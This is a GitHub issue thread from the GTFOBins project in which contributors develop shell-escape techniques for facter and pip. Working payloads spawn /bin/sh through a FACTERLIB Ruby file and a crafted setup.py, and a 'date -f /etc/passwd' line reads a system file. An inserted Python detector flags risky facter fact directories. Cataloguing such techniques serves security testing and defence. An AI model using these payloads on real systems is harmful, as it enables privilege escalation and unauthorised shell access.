Comments (10)
Thanks AlessandroZ, that's a great contribution, I'll work on this in the next few days.
from gtfobins.github.io.
Did you try the facter payload? My version uses a slightly different syntax, i.e. uses --external-dir, but I get no command execution.
$ cat x2
Facter.add(x) do
setcode do
Facter::Core::Execution.execute('/usr/bin/id > /tmp/output')
Facter::Util::Resolution.exec('/usr/bin/id > /tmp/output')
end
end
$ facter --external-dir=.
Fact file ./x2 was parsed but returned an empty data set
...
$ cat /tmp/output
cat: /tmp/output: No such file or directory
Since it's Ruby I also tried some generic Ruby command execution statements, with no luck so far.
from gtfobins.github.io.
Hi,
No, in fact, I haven't tested it before. I do not have custom-dir as well, but it should also be done using the environment variable FACTERLIB. I have just done some tests but without success.
I agree, it's weird, in a lot of examples they launch system commands.
from gtfobins.github.io.
OK, the problem was that directories must be absolute paths.
Also apparently there are two kinds of facts:
- custom facts (that use FACTERLIB) are Ruby files;
- external facts (that use external-dir) are any shebanged executable file.
The nice thing about the former is that the Ruby code is executed within the main ruby process so with an exec we can replace it with a proper interactive shell.
Here's how:
TF=$(mktemp --tmpdir XXXXXXXXXX.rb)
echo 'exec("/bin/sh")' > $TF
FACTERLIB=/tmp/ facter
I'm going to add the binary.
from gtfobins.github.io.
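A defensive counterpart to the comment above, added here as an example (it is not part of the thread or of the GTFOBins project): it reviews command lines for facter runs that load facts through FACTERLIB, --external-dir or --custom-dir from a relative or world-writable directory. The prefix list, the sample command lines and the /opt/example/facts path are constructed assumptions.

```python
import shlex

# Assumption for this example: locations any local user can normally write to.
UNTRUSTED_PREFIXES = ("/tmp", "/var/tmp", "/dev/shm")
DIR_OPTIONS = ("--external-dir", "--custom-dir")

def fact_dirs(cmdline):
    """Return (source, directory) pairs a facter command line loads facts from."""
    tokens = shlex.split(cmdline)
    env = {}
    # Leading NAME=value tokens are environment assignments (FACTERLIB=/tmp/ facter).
    while tokens and "=" in tokens[0] and not tokens[0].startswith("-"):
        name, _, value = tokens.pop(0).partition("=")
        env[name] = value
    if not tokens or tokens[0].rsplit("/", 1)[-1] != "facter":
        return []
    # FACTERLIB is treated as a PATH-style, colon-separated list of directories.
    found = [("FACTERLIB", d) for d in env.get("FACTERLIB", "").split(":") if d]
    args = tokens[1:]
    for i, arg in enumerate(args):
        for opt in DIR_OPTIONS:
            if arg.startswith(opt + "="):
                found.append((opt, arg.split("=", 1)[1]))
            elif arg == opt and i + 1 < len(args):
                found.append((opt, args[i + 1]))
    return found

def findings(cmdline):
    """Flag fact directories that are relative or sit under an untrusted prefix."""
    out = []
    for source, d in fact_dirs(cmdline):
        norm = d.rstrip("/") or "/"
        if not d.startswith("/"):
            out.append((source, d, "relative path"))
        elif any(norm == p or norm.startswith(p + "/") for p in UNTRUSTED_PREFIXES):
            out.append((source, d, "world-writable location"))
    return out

# Constructed sample command lines, e.g. taken from process-execution logs.
SAMPLES = [
    "FACTERLIB=/tmp/ facter",
    "facter --external-dir=.",
    "/usr/bin/facter --custom-dir /opt/example/facts os",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(line, "->", findings(line))
```

Relative directories are reported separately because they can only be judged once resolved against the working directory of the process.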
Awesome, nice work.
from gtfobins.github.io.
I have seen this one too:
date -f /etc/passwd
from gtfobins.github.io.
pip as well using a custom repo:
pip install custom_repo
Like these repos (or another custom one):
from gtfobins.github.io.
Thanks @AlessandroZ, let's see if GitHub can help us keep track of this:
from gtfobins.github.io.
Here's the pip version, it's just execute-interactive, I'm not sure if we should add all the other functions since it's basically Python.
TF=$(mktemp -d)
echo 'import os; os.dup2(0, 1); os.dup2(0, 2); os.execl("/bin/sh", "sh")' > $TF/setup.py
pip install $TF
from gtfobins.github.io.
It's perfect like that. Thanks for your work.
from gtfobins.github.io.